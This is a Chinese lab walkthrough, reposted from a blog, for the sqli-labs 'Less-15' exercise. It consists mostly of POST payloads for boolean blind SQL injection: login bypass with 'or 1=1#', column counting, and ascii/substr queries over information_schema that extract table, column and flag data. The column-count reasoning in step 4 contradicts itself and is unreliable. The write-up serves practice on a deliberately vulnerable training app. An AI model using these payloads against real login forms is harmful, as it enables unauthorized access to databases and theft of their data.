标签：15 登录 Less passwd #& submit uname Submit

less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)

本题使用bool注入

1.判断是否存在注入

uname=a'&passwd=a&submit=Submit

错误登录

uname=a' or 1=1#&passwd=a&submit=Submit

正确登录 => 存在注入

2.判断参数类型

uname=1 or 1=1#&passwd=a&submit=Submit

错误登录

uname=1' or 1=1#&passwd=a&submit=Submit

正确登录 => 字符型

3.进行参数闭合

uname=1' or 1=1#&passwd=a&submit=Submit

正确登录

uname=1' or 1=2#&passwd=a&submit=Submit

错误登录 => 闭合成功

4.查看这个网站后台数据库所在的表有几列

uname=1' or 1=1 order by 2  #&passwd=a&submit=Submit

正确登录

uname=1' or 1=1 order by 1  #&passwd=a&submit=Submit

错误登录 => 有3列

5.因为没有回显，所以使用布尔盲注，判断数据库的长度

uname=1' or length(database())=8  #&passwd=a&submit=Submit

6.查看所在数据库

 uname=1' or  left(database(),1)='s'  #&passwd=a&submit=Submit

 7.查看数据库的表

 uname=1' or  ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n  #&passwd=a&submit=Submit

 a是从0开始第几个表，b从1开始为第几个字符，n是ASCII所对应的十进制数

 8.查看0tUdVIPy表中的列

 uname=1' or  ascii(substr((select column_name from information_schema.columns where table_schema = database() and table_name ="0tUdVIPy" limit 0,1),1,1))>1  #&passwd=a&submit=Submit 

9.查看表中的flag列中的数据

 uname=1' or  ascii(substr((select flag from 0tUdVIPy limit 0,1),1,1))>1  #&passwd=a&submit=Submit 

标签：15,登录,Less,passwd,#&,submit,uname,Submit
来源： https://www.cnblogs.com/WHOAMI-xiaoyu/p/16061912.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。